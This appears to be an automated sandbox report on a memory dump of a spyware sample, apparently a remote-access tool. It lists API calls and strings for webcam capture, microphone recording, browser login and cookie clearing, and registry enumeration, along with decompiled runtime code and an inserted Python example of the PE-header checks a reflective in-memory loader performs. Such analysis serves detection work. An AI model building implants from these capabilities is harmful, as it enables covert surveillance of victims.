                                    • Opcode Fuzzy Hash: ab3ab0b2ec777f5cb57673f9b694a32d594a9a8233eecb7a9ae4cb4c2d78c461
                                    • Instruction Fuzzy Hash: 51F04470A00118FFDB269B54DC4ABAEBFF5EF04711F0042A9F905A2190DB3D5E41CA94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6ab33020fcfd1e66e80c2916e35820c225264561410ce1164b738bb0a95b7c40
                                    • Instruction ID: d4297bc3d30c19803c17df65320301edc3e0119d656c93d298b1925616353043
                                    • Opcode Fuzzy Hash: 6ab33020fcfd1e66e80c2916e35820c225264561410ce1164b738bb0a95b7c40
                                    • Instruction Fuzzy Hash: CA716C31900256DBCB218B99CC84ABEBBF5FF55320F244369E411A72D2D7789F41C7A1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 006D28D8: std::_Xinvalid_argument.LIBCPMT ref: 006D28DD
                                    • Sleep.KERNEL32(00000000,?), ref: 006D45DB
                                      • Part of subcall function 006D471E: __EH_prolog.LIBCMT ref: 006D4723
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: H_prologSleepXinvalid_argumentstd::_
                                    • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                    • API String ID: 834325642-3547787478
                                    • Opcode ID: d0f6cb936f4bb3786083112ff10932bafcb3eae8e18c4b7532448799ab5a3231
                                    • Instruction ID: ad4a995bed2528c6b22612f2e7b2a6ca11591ab62996f590d25a3a0d06d93d6a
                                    • Opcode Fuzzy Hash: d0f6cb936f4bb3786083112ff10932bafcb3eae8e18c4b7532448799ab5a3231
                                    • Instruction Fuzzy Hash: 3C513B71E04241ABCB54BB74D866AAD3B97AF86300F00402FF9469B7D2DF74CE05879A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 006DF14A: SetLastError.KERNEL32(0000000D,006DF6C6,0072F464,00000000,?), ref: 006DF150
                                    • SetLastError.KERNEL32(000000C1,0072F464,00000000,?), ref: 006DF6DD
                                    • GetNativeSystemInfo.KERNEL32(?,0072F464,00000000,?), ref: 006DF750
                                    • GetProcessHeap.KERNEL32(00000008,00000040), ref: 006DF7BC
                                    • HeapAlloc.KERNEL32(00000000), ref: 006DF7C3
                                    • SetLastError.KERNEL32(0000045A), ref: 006DF8D5
                                      • Part of subcall function 006DF65A: VirtualFree.KERNEL32(00008000,00000000,00000000,?,006DF7DC,00000000,00000000,00008000,00000000), ref: 006DF666
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$Heap$AllocFreeInfoNativeProcessSystemVirtual
                                    • String ID:
                                    • API String ID: 486403682-0
                                    • Opcode ID: e88076d98a81b8b61d1b76041ccc465010248cf47e6419843a580d192e4ad5ee
                                    • Instruction ID: 9ac38eed6f5a1ab99846f6b30f27cc3b9f045726eef5214c8e19b572bc61f07b
                                    • Opcode Fuzzy Hash: e88076d98a81b8b61d1b76041ccc465010248cf47e6419843a580d192e4ad5ee
                                    • Instruction Fuzzy Hash: EF61E171E00201ABDB609F65CC81BAABBF7BF84700F14417BE8069B791D7B4D942DB95
                                    Uniqueness

                                    Uniqueness Score: -1.00%
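
                                    The SetLastError calls listed above carry 0xD (ERROR_INVALID_DATA), 0xC1 (ERROR_BAD_EXE_FORMAT) and 0x45A (ERROR_DLL_INIT_FAILED), next to GetNativeSystemInfo (page size), HeapAlloc and VirtualFree. That is the failure-path vocabulary of code that maps a PE image into memory itself instead of calling LoadLibrary: header checks fail with the first two codes, a DllMain that returns FALSE with the third. As an added example (not the sample's code, and not a claim about which loader implementation it embeds), the Python below performs the header validation such a loader needs before it can map an image and returns those same Win32 codes; the image it checks is constructed inside the block.

```python
"""Header validation an in-memory PE loader performs before mapping an image.

Added example for this report, not code from the sample. The error codes are
the Win32 values passed to SetLastError in the function above; the test image
is constructed here and is not the analyzed file.
"""
import struct

ERROR_INVALID_DATA = 0x0D       # blob too short, or section data outside the buffer
ERROR_BAD_EXE_FORMAT = 0xC1     # bad signature, wrong machine, bad alignment or layout
ERROR_DLL_INIT_FAILED = 0x45A   # a loader sets this when the mapped DllMain returns FALSE
ERROR_NAMES = {0: "OK", ERROR_INVALID_DATA: "ERROR_INVALID_DATA",
               ERROR_BAD_EXE_FORMAT: "ERROR_BAD_EXE_FORMAT",
               ERROR_DLL_INIT_FAILED: "ERROR_DLL_INIT_FAILED"}

IMAGE_DOS_SIGNATURE = 0x5A4D         # "MZ"
IMAGE_NT_SIGNATURE = 0x00004550      # "PE\0\0"
IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_MACHINE_AMD64 = 0x8664
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B


def describe(code):
    return ERROR_NAMES.get(code, hex(code))


def _align_up(value, alignment):
    return (value + alignment - 1) & ~(alignment - 1)


def check_pe_image(data, host_machine=IMAGE_FILE_MACHINE_I386, page_size=0x1000):
    """Return 0 if data could be mapped on host_machine, else a Win32 error code.

    page_size stands in for the dwPageSize that GetNativeSystemInfo returns.
    """
    if len(data) < 64:                                   # IMAGE_DOS_HEADER
        return ERROR_INVALID_DATA
    if struct.unpack_from("<H", data, 0)[0] != IMAGE_DOS_SIGNATURE:
        return ERROR_BAD_EXE_FORMAT
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data):                        # Signature + IMAGE_FILE_HEADER
        return ERROR_INVALID_DATA
    sig, machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<IHHIIIHH", data, e_lfanew)
    if sig != IMAGE_NT_SIGNATURE or machine != host_machine:
        return ERROR_BAD_EXE_FORMAT                      # foreign architecture cannot run here
    opt_off = e_lfanew + 24
    if opt_size < 0x40 or opt_off + opt_size > len(data):
        return ERROR_INVALID_DATA
    if struct.unpack_from("<H", data, opt_off)[0] not in (PE32_MAGIC, PE32PLUS_MAGIC):
        return ERROR_BAD_EXE_FORMAT
    # SectionAlignment (+0x20) and SizeOfImage (+0x38) share offsets in PE32 and PE32+
    section_align = struct.unpack_from("<I", data, opt_off + 0x20)[0]
    size_of_image = struct.unpack_from("<I", data, opt_off + 0x38)[0]
    if section_align == 0 or section_align & (section_align - 1):
        return ERROR_BAD_EXE_FORMAT                      # alignment must be a power of two
    sec_off, last_end = opt_off + opt_size, 0
    for n in range(nsections):
        off = sec_off + 40 * n
        if off + 40 > len(data):                         # section table truncated
            return ERROR_INVALID_DATA
        _, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, off)
        if raw_size and raw_ptr + raw_size > len(data):  # section body outside the buffer
            return ERROR_INVALID_DATA
        last_end = max(last_end, va + max(vsize, raw_size))
    if _align_up(last_end, page_size) > _align_up(size_of_image, page_size):
        return ERROR_BAD_EXE_FORMAT                      # sections overrun SizeOfImage
    return 0


def build_minimal_pe(machine=IMAGE_FILE_MACHINE_I386, section_alignment=0x1000,
                     size_of_image=0x2000, raw_ptr=0x200):
    """Constructed one-section PE32 image (headers plus 16 bytes of .text)."""
    dos = bytearray(64)
    struct.pack_into("<H", dos, 0, IMAGE_DOS_SIGNATURE)
    struct.pack_into("<I", dos, 0x3C, 64)                # e_lfanew
    file_hdr = struct.pack("<IHHIIIHH", IMAGE_NT_SIGNATURE, machine, 1, 0, 0, 0, 0xE0, 0x2102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0x00, PE32_MAGIC)
    struct.pack_into("<I", opt, 0x1C, 0x400000)          # ImageBase
    struct.pack_into("<I", opt, 0x20, section_alignment)
    struct.pack_into("<I", opt, 0x24, 0x200)             # FileAlignment
    struct.pack_into("<I", opt, 0x38, size_of_image)
    struct.pack_into("<I", opt, 0x3C, 0x200)             # SizeOfHeaders
    struct.pack_into("<I", opt, 0x5C, 16)                # NumberOfRvaAndSizes
    text = struct.pack("<8sIIIIIIHHI", b".text", 0x10, 0x1000, 0x10, raw_ptr, 0, 0, 0, 0, 0x60000020)
    headers = bytes(dos) + file_hdr + bytes(opt) + text
    return headers.ljust(raw_ptr, b"\0") + b"\xC3" * 0x10


if __name__ == "__main__":
    for label, blob in (("valid", build_minimal_pe()),
                        ("x64 image on x86 host", build_minimal_pe(machine=IMAGE_FILE_MACHINE_AMD64)),
                        ("truncated", build_minimal_pe()[:-8])):
        print(f"{label}: {describe(check_pe_image(blob))}")
```

                                    The machine check is why a 32-bit implant cannot reflectively load a 64-bit payload (and vice versa); the section-bounds and SizeOfImage checks are what stand between a truncated or tampered blob and an out-of-bounds copy during mapping.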

                                    APIs
                                      • Part of subcall function 0070F98C: HeapAlloc.KERNEL32(00000000,?,?,?,006FF244,?,?,006D1696,?,?,?,?,?), ref: 0070F9BE
                                    • _free.LIBCMT ref: 0070E65B
                                    • _free.LIBCMT ref: 0070E672
                                    • _free.LIBCMT ref: 0070E691
                                    • _free.LIBCMT ref: 0070E6AC
                                    • _free.LIBCMT ref: 0070E6C3
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: _free$AllocHeap
                                    • String ID:
                                    • API String ID: 1835388192-0
                                    • Opcode ID: 4720e96ec9ab5792099951f16eef403a3562864ad664b511f2356856543dcb26
                                    • Instruction ID: 97f67a98261e036a5fab461a4a0c3425264d4695d14b0b5913a537ebb7c81409
                                    • Opcode Fuzzy Hash: 4720e96ec9ab5792099951f16eef403a3562864ad664b511f2356856543dcb26
                                    • Instruction Fuzzy Hash: 5C51AF71A00608EFDB24DF29DC41A6AB7F4EF58720F144A6DE949D72D0E73AE951CB80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: 8cc7f042de12760c863b0a2879f7546bdec0b789004d92667baa4aa4d77b740e
                                    • Instruction ID: ed7fe0b4eeff687378a28b108cd111d86129c1db8af2ec0d391585fd045bd7db
                                    • Opcode Fuzzy Hash: 8cc7f042de12760c863b0a2879f7546bdec0b789004d92667baa4aa4d77b740e
                                    • Instruction Fuzzy Hash: 8641D636A00304EFDB24DFB8C885A6DB3F5EF85314B158669E615EB391EB35AD01CB81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 83%
                                    			E105CE4E0(signed int* __ecx, signed int __edx) {
                                    				signed int _v8;
                                    				intOrPtr* _v12;
                                    				signed int _v16;
                                    				signed int _t28;
                                    				signed int _t29;
                                    				intOrPtr _t33;
                                    				signed int _t37;
                                    				signed int _t38;
                                    				signed int _t40;
                                    				void* _t50;
                                    				signed int _t56;
                                    				intOrPtr* _t57;
                                    				signed int _t68;
                                    				signed int _t71;
                                    				signed int _t72;
                                    				signed int _t74;
                                    				signed int _t75;
                                    				signed int _t78;
                                    				signed int _t80;
                                    				signed int* _t81;
                                    				signed int _t85;
                                    				void* _t86;
                                    				signed int _t83;
                                    				signed int _t24;
                                    
                                    				_t72 = __edx;
                                    				_v12 = __ecx;
                                    				_t28 =  *__ecx;
                                    				_t81 =  *_t28;
                                    				if(_t81 != 0) {
                                    					_t29 =  *0x46a00c;
                                    					_t56 =  *_t81 ^ _t29;
                                    					_t78 = _t81[1] ^ _t29;
                                    					_t83 = _t81[2] ^ _t29;
                                    					asm("ror edi, cl");
                                    					asm("ror esi, cl");
                                    					asm("ror ebx, cl");
                                    					if(_t78 != _t83) {
                                    						L14:
                                    						 *_t78 = E105CE3A1( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
                                    						_t33 = L105BFF0F(_t56);
                                    						_t57 = _v12;
                                    						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
                                    						_t24 = _t78 + 4; // 0xfffffa1a
                                    						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = L105BFF0F(_t24);
                                    						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = L105BFF0F(_t83);
                                    						_t37 = 0;
                                    						L15:
                                    						return _t37;
                                    					}
                                    					_t38 = 0x200;
                                    					_t85 = _t83 - _t56 >> 2;
                                    					if(_t85 <= 0x200) {
                                    						_t38 = _t85;
                                    					}
                                    					_t80 = _t38 + _t85;
                                    					if(_t80 == 0) {
                                    						_t80 = 0x20;
                                    					}
                                    					if(_t80 < _t85) {
                                    						L9:
                                    						_push(4);
                                    						_t80 = _t85 + 4;
                                    						_push(_t80);
                                    						_v8 = L105D8BC8(_t56);
                                    						_t40 = E105D1068(0);
                                    						_t68 = _v8;
                                    						_t86 = _t86 + 0x10;
                                    						if(_t68 != 0) {
                                    							goto L11;
                                    						}
                                    						_t37 = _t40 | 0xffffffff;
                                    						goto L15;
                                    					} else {
                                    						_push(4);
                                    						_push(_t80);
                                    						_v8 = L105D8BC8(_t56);
                                    						E105D1068(0);
                                    						_t68 = _v8;
                                    						_t86 = _t86 + 0x10;
                                    						if(_t68 != 0) {
                                    							L11:
                                    							_t56 = _t68;
                                    							_v8 = _t68 + _t85 * 4;
                                    							_t83 = _t68 + _t80 * 4;
                                    							_t78 = _v8;
                                    							_push(0x20);
                                    							asm("ror eax, cl");
                                    							_t71 = _t78;
                                    							_v16 = 0 ^  *0x46a00c;
                                    							asm("sbb edx, edx");
                                    							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
                                    							_v8 = _t74;
                                    							if(_t74 == 0) {
                                    								goto L14;
                                    							}
                                    							_t75 = _v16;
                                    							_t50 = 0;
                                    							do {
                                    								_t50 = _t50 + 1;
                                    								 *_t71 = _t75;
                                    								_t71 = _t71 + 4;
                                    							} while (_t50 != _v8);
                                    							goto L14;
                                    						}
                                    						goto L9;
                                    					}
                                    				}
                                    				return _t28 | 0xffffffff;
                                    			}

                                    Addresses 0x105ce4e0 - 0x105ce61b (the per-line address column of this listing is not reproduced).

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.410957066.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: 34b32c66eb4d22029e8a4803b0364031336475c6bcc7b56bc7984bb1051fc465
                                    • Instruction ID: 88cc65036f95f4701153c1c291e85af6e0d5db5adf872ab7d56fda12dbef2ddb
                                    • Opcode Fuzzy Hash: 34b32c66eb4d22029e8a4803b0364031336475c6bcc7b56bc7984bb1051fc465
                                    • Instruction Fuzzy Hash: CF410476A002009FCB14DFB8C985A5EBBBAEF85714F164569E505EB380E731FD01DB80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 22%
                                    			E105C63FD(void* __edx, void* __eflags, char* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                    				intOrPtr _v8;
                                    				intOrPtr _v12;
                                    				char _v16;
                                    				intOrPtr _v24;
                                    				char _v28;
                                    				void* __ebx;
                                    				char* _t31;
                                    				intOrPtr _t35;
                                    				intOrPtr _t43;
                                    				void* _t51;
                                    				char _t52;
                                    				intOrPtr _t54;
                                    				void* _t56;
                                    				void* _t63;
                                    				void* _t64;
                                    				void* _t67;
                                    				intOrPtr _t66;
                                    
                                    				E105C637A(_t51,  &_v28, __edx, _a24);
                                    				_t52 = 0;
                                    				_t54 =  *((intOrPtr*)(_v24 + 0x14));
                                    				_t31 = _a4;
                                    				_v8 = _t54;
                                    				if(_t31 == 0) {
                                    					L4:
                                    					 *((intOrPtr*)(E105CB377())) = 0x16;
                                    					E105C77D0();
                                    					L18:
                                    					if(_v16 != 0) {
                                    						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                                    					}
                                    					return _t52;
                                    				}
                                    				_t66 = _a8;
                                    				if(_a8 == 0) {
                                    					goto L4;
                                    				}
                                    				 *_t31 = 0;
                                    				if(_a12 == 0 || _a16 == 0) {
                                    					goto L4;
                                    				} else {
                                    					_t35 =  *0x4532cc(_t54, 0, _a12, 0xffffffff, 0, 0);
                                    					_v12 = _t35;
                                    					if(_t35 != 0) {
                                    						_t64 = E105D07FF(_t54, _t35 + _t35);
                                    						_t56 = _t63;
                                    						if(_t64 != 0) {
                                    							_push(_v12);
                                    							_push(_t64);
                                    							_push(0xffffffff);
                                    							_push(_a12);
                                    							_push(0);
                                    							_push(_v8);
                                    							if( *0x4532cc() != 0) {
                                    								_t67 = E105D07FF(_t56, _t66 + _t66);
                                    								if(_t67 != 0) {
                                    									_t43 = E105D22C6(0, __edx, _t67, _a8, _t64, _a16, _a20, _a24);
                                    									_v12 = _t43;
                                    									if(_t43 != 0) {
                                    										_push(0);
                                    										_push(0);
                                    										_push(_a8);
                                    										_push(_a4);
                                    										_push(0xffffffff);
                                    										_push(_t67);
                                    										_push(0);
                                    										_push(_v8);
                                    										if( *0x4532d8() != 0) {
                                    											_t52 = _v12;
                                    										} else {
                                    											E105CB341( *0x453234());
                                    										}
                                    									}
                                    								}
                                    								E105D1068(_t67);
                                    							} else {
                                    								E105CB341( *0x453234());
                                    							}
                                    						}
                                    						E105D1068(_t64);
                                    					} else {
                                    						E105CB341( *0x453234());
                                    					}
                                    					goto L18;
                                    				}
                                    			}

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.410957066.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: __dosmaperr$_free
                                    • String ID:
                                    • API String ID: 242264518-0
                                    • Opcode ID: 7eda0840fabd0fd668bfc2178d3953f8096d7b1bca186f1ed6d2dd42c853aa18
                                    • Instruction ID: 05ffa05f42836130a1d39b8eccef98002e6591bb41f5d08dff1286577cf09fe7
                                    • Opcode Fuzzy Hash: 7eda0840fabd0fd668bfc2178d3953f8096d7b1bca186f1ed6d2dd42c853aa18
                                    • Instruction Fuzzy Hash: 8631A07640064ABBDF019FE48E89AAF3F6CEF492A1F600169F81096190DB31EA11DB71
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,006F8E1A,?,?,?,00000001,?,?,00000001,006F8E1A,006F8E1A), ref: 007193F9
                                    • __alloca_probe_16.LIBCMT ref: 00719431
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,006F8E1A,?,?,?,00000001,?,?,00000001,006F8E1A,006F8E1A,?), ref: 00719482
                                    • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,?,00000001,006F8E1A,006F8E1A,?,00000002,?), ref: 00719494
                                    • __freea.LIBCMT ref: 0071949D
                                      • Part of subcall function 0070F98C: HeapAlloc.KERNEL32(00000000,?,?,?,006FF244,?,?,006D1696,?,?,?,?,?), ref: 0070F9BE
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                    • String ID:
                                    • API String ID: 1857427562-0
                                    • Opcode ID: 8dc96b51195e534c23c5976c1d3276e954f1ecf3ff43060bb031c04bfb8e5c08
                                    • Instruction ID: bf07a05af39d6a7c17b54392a62e3909b61317d370aa2ed1f17596422d60a464
                                    • Opcode Fuzzy Hash: 8dc96b51195e534c23c5976c1d3276e954f1ecf3ff43060bb031c04bfb8e5c08
                                    • Instruction Fuzzy Hash: E731CC72A0020AABDF249F68DC55DEF7BA5EB00710F044128FD08D6191E739DD92CBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    • [Info], xrefs: 006DA61B
                                    • Cleared browsers logins and cookies., xrefs: 006DA60C
                                    • [Cleared browsers logins and cookies.], xrefs: 006DA5FB
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep
                                    • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.$[Info]
                                    • API String ID: 3472027048-899236412
                                    • Opcode ID: e15ae621cd0769ea7a26e14c8a290fa67a3acaba6eab2e53d8f6be95a260b7e6
                                    • Instruction ID: 0b74fe58949329a312a99b4b25a3f99f57bc51170a97e2eab12ed1215d21094e
                                    • Opcode Fuzzy Hash: e15ae621cd0769ea7a26e14c8a290fa67a3acaba6eab2e53d8f6be95a260b7e6
                                    • Instruction Fuzzy Hash: 6B31E421E4D3C16EDA126BF838267FA6B930F53754F09806FF8D00B393D9964808936B
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 006D1BDD
                                    • waveInOpen.WINMM(0073BAB0,000000FF,0073BA98,Function_00001CEF,00000000,00000000,00000024), ref: 006D1C73
                                    • waveInPrepareHeader.WINMM(0073BA78,00000020), ref: 006D1CC7
                                    • waveInAddBuffer.WINMM(0073BA78,00000020), ref: 006D1CD6
                                    • waveInStart.WINMM ref: 006D1CE2
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                    • String ID:
                                    • API String ID: 1356121797-0
                                    • Opcode ID: 683856ac1688c4412e57581decf46cc1bb21dd2c9a9da906dbb428f8737a80c3
                                    • Instruction ID: 5098f82a7c65e35bbfe24fd906d9d7e3d14cf82d26c0ca2e48197d24108299d7
                                    • Opcode Fuzzy Hash: 683856ac1688c4412e57581decf46cc1bb21dd2c9a9da906dbb428f8737a80c3
                                    • Instruction Fuzzy Hash: B1215C71A04A00ABE714DF76AC0A91A7BA5EB89312B00C02EF305DAAB1EB7C45019B5C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetEnvironmentStringsW.KERNEL32 ref: 007175E3
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00717606
                                      • Part of subcall function 0070F98C: HeapAlloc.KERNEL32(00000000,?,?,?,006FF244,?,?,006D1696,?,?,?,?,?), ref: 0070F9BE
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0071762C
                                    • _free.LIBCMT ref: 0071763F
                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0071764E
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                    • String ID:
                                    • API String ID: 2278895681-0
                                    • Opcode ID: a72bde7abffcc27513b7a3629887304d55ed0e97f9301f66a59572cb33e0ee17
                                    • Instruction ID: bd5cdaaa1fb6cd12c57856179e30134cc743368cfe0d270b14b4d72ffedabe3e
                                    • Opcode Fuzzy Hash: a72bde7abffcc27513b7a3629887304d55ed0e97f9301f66a59572cb33e0ee17
                                    • Instruction Fuzzy Hash: 980184B2605A15BF673516AE5C8DCBB7A7DDBC6FA03140129F904C3280DE6D8D42D1B4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetLastError.KERNEL32(?,?,?,0070A509,0070F9CF,?,?,006FF244,?,?,006D1696,?,?,?,?,?), ref: 00711D6B
                                    • _free.LIBCMT ref: 00711DA0
                                    • _free.LIBCMT ref: 00711DC7
                                    • SetLastError.KERNEL32(00000000), ref: 00711DD4
                                    • SetLastError.KERNEL32(00000000), ref: 00711DDD
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$_free
                                    • String ID:
                                    • API String ID: 3170660625-0
                                    • Opcode ID: 805a63daa31bd173b882cedac10daa846ecc069221d26004415ce70dce960656
                                    • Instruction ID: a7e72125ca1319e437e58b40f624933d144441d46e06c312f1258f88e61637dc
                                    • Opcode Fuzzy Hash: 805a63daa31bd173b882cedac10daa846ecc069221d26004415ce70dce960656
                                    • Instruction Fuzzy Hash: D4014936340200FB9322636D7C4EDDF26799BC13B17600129F744962D2EE7CCD824124
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _free.LIBCMT ref: 00718C54
                                      • Part of subcall function 007101F5: HeapFree.KERNEL32(00000000,00000000,?,00718EEF,?,00000000,?,00000000,?,00719193,?,00000007,?,?,007196DE,?), ref: 0071020B
                                      • Part of subcall function 007101F5: GetLastError.KERNEL32(?,?,00718EEF,?,00000000,?,00000000,?,00719193,?,00000007,?,?,007196DE,?,?), ref: 0071021D
                                    • _free.LIBCMT ref: 00718C66
                                    • _free.LIBCMT ref: 00718C78
                                    • _free.LIBCMT ref: 00718C8A
                                    • _free.LIBCMT ref: 00718C9C
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: b448499165ef86bcfddd747c0fa659aafdf82417942d436b866dd26b9872b713
                                    • Instruction ID: 10beddef9079f681efc48dc1544c556ca59fe858cd5454be2e086be216b5581d
                                    • Opcode Fuzzy Hash: b448499165ef86bcfddd747c0fa659aafdf82417942d436b866dd26b9872b713
                                    • Instruction Fuzzy Hash: 17F03C32505218FB8760EB6DE98AC9A73F9AB407107644849F288D7580CF6CFCC08AB6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _free.LIBCMT ref: 0070D8DA
                                      • Part of subcall function 007101F5: HeapFree.KERNEL32(00000000,00000000,?,00718EEF,?,00000000,?,00000000,?,00719193,?,00000007,?,?,007196DE,?), ref: 0071020B
                                      • Part of subcall function 007101F5: GetLastError.KERNEL32(?,?,00718EEF,?,00000000,?,00000000,?,00719193,?,00000007,?,?,007196DE,?,?), ref: 0071021D
                                    • _free.LIBCMT ref: 0070D8EC
                                    • _free.LIBCMT ref: 0070D8FF
                                    • _free.LIBCMT ref: 0070D910
                                    • _free.LIBCMT ref: 0070D921
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: bfe0bc0f74245e4b5cc9016fcd18441c1b1703b90948e740adb443bcc8a051b9
                                    • Instruction ID: c61bc81ed53b6879e6e5f6762c0af4216f64b451ea5333385647261c7ac8620b
                                    • Opcode Fuzzy Hash: bfe0bc0f74245e4b5cc9016fcd18441c1b1703b90948e740adb443bcc8a051b9
                                    • Instruction Fuzzy Hash: 82F03A71802A20EFE7116F28AC464483B60A704722702C106F344526B1EF7D08C5EFCA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 006E0DF5
                                    • RegEnumKeyExW.ADVAPI32 ref: 006E0E24
                                    • RegEnumValueW.ADVAPI32 ref: 006E0EC4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Enum$InfoQueryValue
                                    • String ID: [regsplt]
                                    • API String ID: 3554306468-4262303796
